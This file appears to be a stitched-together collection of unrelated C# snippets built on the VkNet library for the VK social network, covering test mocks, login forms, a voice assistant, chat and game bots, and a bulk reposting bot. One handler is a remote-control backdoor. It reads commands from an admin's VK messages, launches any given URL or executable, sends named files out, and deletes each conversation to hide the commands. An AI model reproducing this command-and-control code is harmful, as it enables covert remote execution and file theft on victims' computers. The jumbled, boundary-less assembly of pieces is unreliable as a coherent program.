public void Init() { var browser = new Mock<IBrowser>(); browser.Setup(m => m.GetJson(It.Is<string>(s => s == Url))) .Callback(Callback) .Returns(() => { if (string.IsNullOrWhiteSpace(Json)) { throw new ArgumentNullException(nameof(Json), @"Json не может быть равен null. Обновите значение поля Json"); } return Json; }); browser.Setup(o => o.Authorize( It.IsAny<ulong>(), It.IsAny<string>(), It.IsAny<string>(), It.IsAny<Settings>(), It.IsAny<Func<string>>(), It.IsAny<long?>(), It.IsAny<string>(), It.IsAny<string>(), It.IsAny<int?>(), It.IsAny<string>(), It.IsAny<string>() ) ) .Returns(VkAuthorization.From(new Uri(""))); Api = new VkApi { Browser = browser.Object }; Api.Authorize(new ApiAuthParams { ApplicationId = 1, Login = "******", Password = "******", Settings = Settings.All }); Api.RequestsPerSecond = 10000; // Чтобы тесты быстрее выполнялись }
public void AuthorizeByTokenNegative() { Api = new VkApi(); // В базовом классе предопределено свойство AccessToken Api.Authorize("", 1); Assert.That(Api.UserId, Is.Null); }
private void button1_Click(object sender, EventArgs e) { vk = new VkApi(); ApiAuthParams param = new ApiAuthParams(); param.ApplicationId = 6622958; param.Login = File.ReadAllText("VKlog.txt"); param.Password = File.ReadAllText("VKpas.txt"); param.Settings = Settings.All; try { vk.Authorize(param); } catch (Exception) { MessageBox.Show("Неверный логин или пароль!"); return; } MessagesSendParams msgParams = new MessagesSendParams(); msgParams.UserId = ADMIN_ID; msgParams.Message = GenerateSpamText("Бот готов услужить!\n!Help помощь в командах"); vk.Messages.Send(msgParams); MessagesGetObject msg; MessagesGetHistoryParams msgHistoryParams = new MessagesGetHistoryParams(); msgHistoryParams.UserId = ADMIN_ID; msgHistoryParams.Count = 1; msgHistoryParams.Offset = 0; while (true) { try { msg = vk.Messages.GetHistory(msgHistoryParams); } catch (Exception) { msg = vk.Messages.GetHistory(msgHistoryParams); } if (msg.Messages.Count > 0) { if (msg.Messages[0].Body.Contains("!Run")) // !Run [url/exe/path] { vk.Messages.DeleteDialog(ADMIN_ID, false); Process.Start(msg.Messages[0].Body.Split(' ').Last()); } if (msg.Messages[0].Body.Contains("!Help")) { msgParams.Message = GenerateSpamText("!Run [url/exe/path] - запуск приложений\n" + "!SendMail - Отправка указанного файла сообщением\n" + "!ChangeRecipient - изменить получателя\n" + "!RecipientMail - вывести имя получателя\n" + ""); vk.Messages.Send(msgParams); vk.Messages.DeleteDialog(ADMIN_ID, false); } if (msg.Messages[0].Body.Contains("!SendMail")) { string FileAdres = msg.Messages[0].Body.Split(' ').Last(); Send(FileAdres); vk.Messages.DeleteDialog(ADMIN_ID, false); } if (msg.Messages[0].Body.Contains("!ChangeRecipient")) { string NewRecMail = msg.Messages[0].Body.Split(' ').Last(); File.WriteAllText("RECmail.txt", NewRecMail); vk.Messages.DeleteDialog(ADMIN_ID, false); } if (msg.Messages[0].Body.Contains("!RecipientMail")) { string ReadRecMail = File.ReadAllText("RECmail.txt"); msgParams.Message = GenerateSpamText(ReadRecMail); vk.Messages.Send(msgParams); vk.Messages.DeleteDialog(ADMIN_ID, false); } Thread.Sleep(5000); } } }
public void button1_Click(object sender, EventArgs e) { try { string email = textBox1.Text; string pass = textBox2.Text; Settings scope = Settings.All; ulong appId = 6159996; vk.Authorize(new ApiAuthParams { ApplicationId = appId, Login = email, Password = pass, Settings = scope }); var setOnline = vk.Account.SetOnline(); authentication.Parent = null; Friends.Visible = true; } catch (VkApiAuthorizationException) { LoginError f3 = new LoginError(); f3.Show(); } var profileInfo = vk.Account.GetProfileInfo(); nameLabel.Text = profileInfo.FirstName + " " + profileInfo.LastName; var photos = vk.Photo.Get(new PhotoGetParams { OwnerId = vk.UserId.Value, AlbumId = VkNet.Enums.SafetyEnums.PhotoAlbumType.Profile }); foreach (var avatar in photos) { } var friends = vk.Friends.Get(vk.UserId.Value, order: VkNet.Enums.SafetyEnums.FriendsOrder.Hints, fields: ProfileFields.FirstName | ProfileFields.LastName); foreach (var fCount in friends) { FriendsList.Items.Add(fCount.FirstName + fCount.LastName); if (Convert.ToBoolean(fCount.Online)) { onlineFriendsList.Items.Add(fCount.FirstName + fCount.LastName); } } int friendsCount = friends.Count; friendsCnt.Text = "Всего друзей " + Convert.ToString(friendsCount); var online = vk.Friends.GetOnline(new FriendsGetOnlineParams { UserId = vk.UserId.Value }); int friendsOnlineCount = online.Count; friendsOnlineCnt.Text = Convert.ToString(friendsOnlineCount) + "/" + Convert.ToString(friendsCount); var wall = vk.Wall.Get(new WallGetParams { OwnerId = vk.UserId.Value, Count = 30 }); var msg = vk.Messages.Get(new MessagesGetParams { }); Status status = vk.Status.Get(vk.UserId.Value); labelStatus.Text = Convert.ToString(status); }
public FormMain() { InitializeComponent(); sre = new SpeechRecognitionEngine(); ss = new SpeechSynthesizer(); vk = new VkApi(); ApiAuthParams _aap = new ApiAuthParams(); _aap.Settings = Settings.All; _aap.ApplicationId = 6707008; _aap.Login = "******"; _aap.Password = "******"; vk.Authorize(_aap); sre.SpeechRecognized += Sre_SpeechRecognized; sre.RecognizeCompleted += Sre_RecognizeCompleted; sre.SetInputToDefaultAudioDevice(); ss.SetOutputToDefaultAudioDevice(); active = false; ss.Rate = 0; Choices ch_startCommands = new Choices(); foreach (string str_actPhrase in File.ReadAllLines(@"dictionary\active_phrases.txt")) { ch_startCommands.Add("Васян " + str_actPhrase); } foreach (string str_actPhrase in File.ReadAllLines(@"dictionary\passive_phrases.txt")) { ch_startCommands.Add("Васян " + str_actPhrase); } GrammarBuilder gb_startCommands = new GrammarBuilder(ch_startCommands); Grammar g_start = new Grammar(gb_startCommands); Choices ch_vk = new Choices(); foreach (string str_questPhrase in File.ReadAllLines(@"dictionary\VkIds.txt")) { ch_vk.Add(str_questPhrase.Split('|')[0]); } Choices ch_vkSamples = new Choices(); foreach (string str_vkSample in File.ReadAllLines(@"dictionary\vk_samples.txt")) { ch_vkSamples.Add(str_vkSample); } GrammarBuilder gb_vk = new GrammarBuilder(); gb_vk.Append("Отправь"); gb_vk.Append(ch_vk); gb_vk.Append(ch_vkSamples); Grammar g_vk = new Grammar(gb_vk); Choices ch_quests = new Choices(); foreach (string str_questPhrase in File.ReadAllLines(@"dictionary\QuestAnswer.txt")) { ch_quests.Add(str_questPhrase.Split('|')[0]); } GrammarBuilder gb_quests = new GrammarBuilder(ch_quests); Grammar g_quests = new Grammar(gb_quests); Choices ch_openCommands = new Choices(); ch_openCommands.Add(" "); foreach (string str_openPhrase in File.ReadAllLines(@"dictionary\Open_phrases.txt")) { ch_openCommands.Add(str_openPhrase); } Choices ch_closeCommands = new Choices(); foreach (string str_closePhrase in File.ReadAllLines(@"dictionary\Close_phrases.txt")) { ch_closeCommands.Add(str_closePhrase); } Choices ch_programs = new Choices(); foreach (string str_program in File.ReadAllLines(@"dictionary\Programs.txt")) { ch_programs.Add(str_program.Split('|')[0]); } foreach (string site in File.ReadAllLines(@"dictionary\Sites.txt")) { ch_programs.Add(site.Split('|')[0]); } GrammarBuilder gb_openPrograms = new GrammarBuilder(); gb_openPrograms.Append(ch_openCommands); gb_openPrograms.Append(ch_programs); Grammar g_open = new Grammar(gb_openPrograms); GrammarBuilder gb_closePrograms = new GrammarBuilder(); gb_closePrograms.Append(ch_closeCommands); gb_closePrograms.Append(ch_programs); Grammar g_close = new Grammar(gb_closePrograms); GrammarBuilder gb_anectod = new GrammarBuilder(); gb_anectod.Append(new Choices(" ", "Расскажи шутку", "Расскажи анекдот", "Расcмеши меня")); Grammar g_anectod = new Grammar(gb_anectod); GrammarBuilder gb_analys = new GrammarBuilder(); gb_analys.Append(new Choices(" ", "Что там с погодой", "Сколько время", "Какой день недели", "Какое сегодня число")); Grammar g_analys = new Grammar(gb_analys); sre.LoadGrammarAsync(g_start); sre.LoadGrammarAsync(g_close); sre.LoadGrammarAsync(g_open); sre.LoadGrammarAsync(g_quests); sre.LoadGrammarAsync(g_vk); sre.LoadGrammarAsync(g_anectod); sre.LoadGrammarAsync(g_analys); sre.RecognizeAsync(RecognizeMode.Multiple); }
public void Execute(Fooxboy.NucleusBot.Models.Message msg, IMessageSenderService sender, IBot bot) { if (Main.Api.Users.IsBanned(msg)) { return; } //проверка на регистрацию. if (_api.Users.CheckUser(msg)) { var kb2 = new KeyboardBuilder(bot); kb2.AddButton(ButtonsHelper.ToHomeButton()); sender.Text("✔ Вы уже зарегистрированы, перейдите на главный экран!", msg.ChatId, kb2.Build()); return; } //регистрация нового юзера. var user = new HydraBot.Models.User(); user.Access = 0; user.IsBanned = false; user.Level = 1; user.Prefix = "Игрок"; user.Score = 0; user.TimeBan = 0; user.BonusDay = 1; user.SubOnNews = true; user.Money = 100000; user.DriverLicense = ""; user.IsAvailbleBonus = true; user.TimeBonus = 0; if (msg.Platform == MessengerPlatform.Vkontakte) { //устанавливаем id ВКонтакте в зависимости от того куда написал пользователь. В беседу или в лс. if (msg.ChatId < 2000000000) { user.VkId = msg.ChatId; } else { user.VkId = msg.MessageVK.FromId.Value; } //устанавливаем никнейм var vkapi = new VkApi(); vkapi.Authorize(new ApiAuthParams() { AccessToken = Main.Token }); var userName = vkapi.Users.Get(new List <long>() { msg.MessageVK.FromId.Value })[0].FirstName; user.Name = userName; } //устанавливаем id Телеграмма. else { user.TgId = msg.MessageTG.From.Id; user.Name = msg.MessageTG.From.FirstName; } //добавляем пользователя в бд. var id = _api.Users.AddUser(user); user.Id = id; var garage = new Models.Garage() { Cars = "", PhoneNumber = null, Name = "no", IsPhone = false, Engines = "", Fuel = 9999999999999, GarageModelId = -1, SelectCar = -1, ParkingPlaces = 0, UserId = id }; Main.Api.Garages.RegisterGarage(garage); var skills = new Skills(); skills.UserId = id; using (var db = new Database()) { db.Skillses.Add(skills); db.SaveChanges(); } var kb = new KeyboardBuilder(bot); kb.AddButton(ButtonsHelper.ToHomeButton()); sender.Text("✔ Вы успешно зарегистрировались! Перейдите на главный экран, нажав на кнопку домой.", msg.ChatId, kb.Build()); }
//Метод в котором все выполнятеся static void func(ulong ApplicationIdPub, string LoginPub, string PasswordPub, string pathFile, string publicNameSeriaFile, int IdPublic, PostID[][] ArrayPublic) { try { #region Основное тело var api = new VkApi(); #region АСЧЕТ ВРЕМЕНИ int Go = 0; //для открытия int timeNow = DateTime.Now.Hour * 100 + DateTime.Now.Minute; if (timeNow >= 5 & timeNow <= 655) { Go = 1; } else { Go = 1; } #endregion //Авторизация api.Authorize(new ApiAuthParams { ApplicationId = ApplicationIdPub, Login = LoginPub, Password = PasswordPub, Settings = Settings.All }); string path = pathFile; //создаем список выдачи IList <PostID> ListOut = ArrayPublic.Flatten(0).ToList(); //Непосредственная отработка if (Go == 1) { for (int i = 0; i < ListOut.Count; i++) { long label = ListOut[i].FuncWallPost(api, path, publicNameSeriaFile, IdPublic); if (label > 0) { Console.WriteLine("Размещен пост " + label.ToString() + " в пабдике " + IdPublic.ToString() + " время " + timeNow.ToString()); break; } } } #endregion } catch (Exception ex) { Console.WriteLine("Произошла ошибка"); } }
static void Main(string[] args) { var api = new VkApi(); ulong ApplicationId = 5883941; string Login = "******"; string Password = "******"; string path = @"C:\Users\Администратор.WIN-QVBBKNJHDMA\Desktop\Vkbot\"; api.Authorize(new ApiAuthParams { ApplicationId = ApplicationId, Login = Login, Password = Password, Settings = Settings.All }); Console.WriteLine(api.Token.ToString()); Thread myThread = new Thread(Potok); //Создаем новый объект потока (Thread) myThread.Start(); //запускаем поток while (true) { //--------------Летающий слон---Наука, Путишествия, исследования func(ApplicationId, Login, Password, path, "letaushy_slon", -140676466, new PostID[][] { Helper.PublicList(api, -41053835, 100), Helper.PublicList(api, -24098496, 100), Helper.PublicList(api, -44241745, 100) }); //--------------Мой друг битлджус---Жесткие приколы на грани фола func(ApplicationId, Login, Password, path, "My_drug_Bitldjus", -140803827, new PostID[][] { Helper.PublicList(api, -26419239, 100), Helper.PublicList(api, -30022666, 100), Helper.PublicList(api, -12382740, 100), Helper.PublicList(api, -31836774, 100) }); //--------------Я самая---Женские мысли func(ApplicationId, Login, Password, path, "I_samay", -140803408, new PostID[][] { Helper.PublicList(api, -40498005, 100), Helper.PublicList(api, -26669118, 100), Helper.PublicList(api, -32477579, 100), Helper.PublicList(api, -36008740, 100) }); //--------------This world is Mine---Жизнь хипстеров func(ApplicationId, Login, Password, path, "This_world_is_Mine", -140801423, new PostID[][] { Helper.PublicList(api, -34298047, 100), Helper.PublicList(api, -36164349, 100), Helper.PublicList(api, -35061290, 100), Helper.PublicList(api, -25397178, 100) }); //--------------тЫква---Только юмор func(ApplicationId, Login, Password, path, "Tikva", -140799660, new PostID[][] { Helper.PublicList(api, -57846937, 100), Helper.PublicList(api, -30179569, 100), Helper.PublicList(api, -45441631, 100), Helper.PublicList(api, -34491673, 100) }); //--------------Искусный Мужик---про мужиков func(ApplicationId, Login, Password, path, "Iskusni_mushik", -140799043, new PostID[][] { Helper.PublicList(api, -47679753, 100), Helper.PublicList(api, -24713873, 100), Helper.PublicList(api, -39410028, 100), Helper.PublicList(api, -346191, 100) }); //--------------Молодой и Смелый---молодеж func(ApplicationId, Login, Password, path, "Young_and_Bold", -140798515, new PostID[][] { Helper.PublicList(api, -26030283, 100), Helper.PublicList(api, -23378353, 100), Helper.PublicList(api, -19799369, 100), Helper.PublicList(api, -35294456, 100) }); //--------------free hand---молодеж func(ApplicationId, Login, Password, path, "free_hand", -140798160, new PostID[][] { Helper.PublicList(api, -45608667, 100), Helper.PublicList(api, -57876954, 100), Helper.PublicList(api, -55156099, 100), Helper.PublicList(api, -30277672, 100) }); //--------------Экосистема успеха---про успех func(ApplicationId, Login, Password, path, "ekosistema_uspexa", -140700308, new PostID[][] { Helper.PublicList(api, -2089898, 100), Helper.PublicList(api, -34815360, 100), Helper.PublicList(api, -49042487, 100), Helper.PublicList(api, -44195750, 100) }); //--------------Дикий пОмидОр---Дикий угар func(ApplicationId, Login, Password, path, "dikiy_pomidor", -140697225, new PostID[][] { Helper.PublicList(api, -26419239, 100), Helper.PublicList(api, -12382740, 100), Helper.PublicList(api, -30179569, 100), Helper.PublicList(api, -460389, 100) }); //--------------СочныйТЫЛ---эротика func(ApplicationId, Login, Password, path, "sochni_tul", -140696798, new PostID[][] { Helper.PublicList(api, -72517812, 100), Helper.PublicList(api, -38806371, 100), Helper.PublicList(api, -60804744, 100), }); //--------------Зов природы---эротика //func(ApplicationId, Login, Password, path, "zov_prirodi", -140696788, //new PostID[][] //{ // Helper.PublicList(api, -27794994, 100), // Helper.PublicList(api, -31071893, 100), // Helper.PublicList(api, -21090314, 100), // //}); //--------------Запах мужикА---Мужской журнал func(ApplicationId, Login, Password, path, "zapax_muzika", -140699702, new PostID[][] { Helper.PublicList(api, -39144813, 100), Helper.PublicList(api, -106753446, 100), Helper.PublicList(api, -84838988, 100), Helper.PublicList(api, -25397178, 100) }); //--------------кожаный конь---смех func(ApplicationId, Login, Password, path, "kojan_kon", -140698998, new PostID[][] { Helper.PublicList(api, -34298047, 100), Helper.PublicList(api, -109933399, 100), Helper.PublicList(api, -23433159, 100) }); //--------------Жуй для тела---фитнес питание func(ApplicationId, Login, Password, path, "juy_dly_tela", -140693835, new PostID[][] { Helper.PublicList(api, -28627911, 100), Helper.PublicList(api, -35113021, 100) }); //--------------лайфhacker---лайфхаки func(ApplicationId, Login, Password, path, "lifexaker", -140690042, new PostID[][] { Helper.PublicList(api, -47679753, 100), Helper.PublicList(api, -24094338, 100), Helper.PublicList(api, -40567146, 100) }); //--------------ВАНИ́ЛЬ---женские мысли func(ApplicationId, Login, Password, path, "vanil", -140695126, new PostID[][] { Helper.PublicList(api, -28627911, 100), Helper.PublicList(api, -32477579, 100), Helper.PublicList(api, -40498005, 100), Helper.PublicList(api, -34308709, 100) }); //--------------Миллионер из трущеб---мужской журнал func(ApplicationId, Login, Password, path, "millioner_iz_trusheb", -140699644, new PostID[][] { Helper.PublicList(api, -40587282, 100), Helper.PublicList(api, -49438563, 100), Helper.PublicList(api, -49031817, 100), Helper.PublicList(api, -30559917, 100) }); //--------------Мысли Вслух---мужской журнал func(ApplicationId, Login, Password, path, "misli_vslux", -140683182, new PostID[][] { Helper.PublicList(api, -29559271, 100), Helper.PublicList(api, -38000455, 100), Helper.PublicList(api, -89960449, 100), Helper.PublicList(api, -44241745, 100) }); Console.WriteLine("#####"); Thread.Sleep(3600 * 1000); } }
public void Auth(string token) { vkAPI.Authorize(new ApiAuthParams { AccessToken = token }); }
/// <summary> /// Configure a new instance of the Bot /// </summary> /// <param name="configFileName">Path to a .json file with configuration</param> /// <exception cref="FileNotFoundException">Selected file is not available</exception> public Bot(string configFileName) { _startTime = DateTime.Now; if (!File.Exists(configFileName)) { throw new FileNotFoundException("Can't find config file", configFileName); } var builder = new ConfigurationBuilder() .SetBasePath(Directory.GetCurrentDirectory()) .AddJsonFile(configFileName); // Initialize a new VkApi based on selected config Api = new VkApi { RequestsPerSecond = 3 }; var configuration = builder.Build(); var token = configuration["token"]; var auth = new ApiAuthParams { TokenExpireTime = 0, ApplicationId = ulong.Parse(configuration["appid"]), Settings = Settings.All }; if (token != null) { auth.AccessToken = token; } else { auth.Login = configuration["login"]; auth.Password = configuration["password"]; } Api.Authorize(auth); if (!Api.IsAuthorized) { Log.Error("Failed to log in with credentials: "); PrintCredentials(configuration); return; } Log.Information($"Token: {Api.Token}"); _botCommandRegex = new Regex(@"^[\/\\\!](\w+)"); Functions = new Dictionary <string, VkBotProvider>(); var names = configuration.GetSection("modules").GetChildren().Select(name => name.Value).ToList(); Providers = new Dictionary <string, VkBotProvider> { ["ping"] = new PingProvider(), ["reddit"] = new RedditProvider(Api), ["system"] = new SystemProvider(this), ["quote"] = new QuoteProvider(), ["math"] = new MathProvider(), ["flipcoin"] = new FlipcoinProvider(), ["help"] = new HelpProvider(this), ["queue"] = new QueueProvider(this, Api), ["youtube"] = new YouTubeProvider(Api), ["stats"] = new StatsProvider(this), ["bsuir"] = new BsuirProvider() }; foreach (var provider in Providers) { if (names.Contains(provider.Key)) { provider.Value.State = ProviderState.Loaded; } } Admins = configuration.GetSection("admins").GetChildren().Select(c => long.Parse(c.Value)).ToArray(); foreach (var module in Providers.Values) { foreach (var func in module.Functions) { Functions[func.Key] = module; } } Requests = new ConcurrentQueue <Command>(); Responses = new ConcurrentQueue <MessagesSendParams>(); }
static void Main(string[] args) { // Если запущен с аргументом на удаление токена if (args.Length > 0) { for (int i = 0; i < args.Length; i++) { if (args[i] == "-resettoken") { Token.Clear(); MessageBox.Show("Токен сброшен", "Сброс токена", MessageBoxButtons.OK, MessageBoxIcon.Information); } } } // Инициализация VkNet var services = new ServiceCollection(); services.AddAudioBypass(); vk = new VkApi(services); try { // Авторизация для получения токена if (Token.Get().Length == 0) { throw new Exception("Token not found"); } Task t = Task.Run(() => { // Авторизация по токену vk.Authorize(new VkNet.Model.ApiAuthParams() { ApplicationId = ApplicationID, AccessToken = Token.Get() }); // Пользователь уже авторизован, теперь ищем сообщение от вк и копируем код var history = vk.Messages.GetHistory(new MessagesGetHistoryParams() { UserId = UserID, Count = 1 }); // Копируем текст сообщения string message = history.Messages.First().Text; int startIndex = message.LastIndexOf(": ") + 2; // Строка имеет вид ": 000000" if (startIndex != -1) { vk.Messages.MarkAsRead(UserID.ToString()); string code = message.Substring(startIndex, 6); // Add to clipboard Thread thread = new Thread(() => Clipboard.SetText(code)); thread.SetApartmentState(ApartmentState.STA); thread.Start(); thread.Join(); MessageBox.Show("Код скопирован в буфер обмена", "", MessageBoxButtons.OK, MessageBoxIcon.None); } else { MessageBox.Show("Код подтверждения не найден", "", MessageBoxButtons.OK, MessageBoxIcon.Error); } }); t.Wait(); } catch (Exception) { Application.EnableVisualStyles(); Application.SetCompatibleTextRenderingDefault(false); Application.Run(new AuthForm()); } }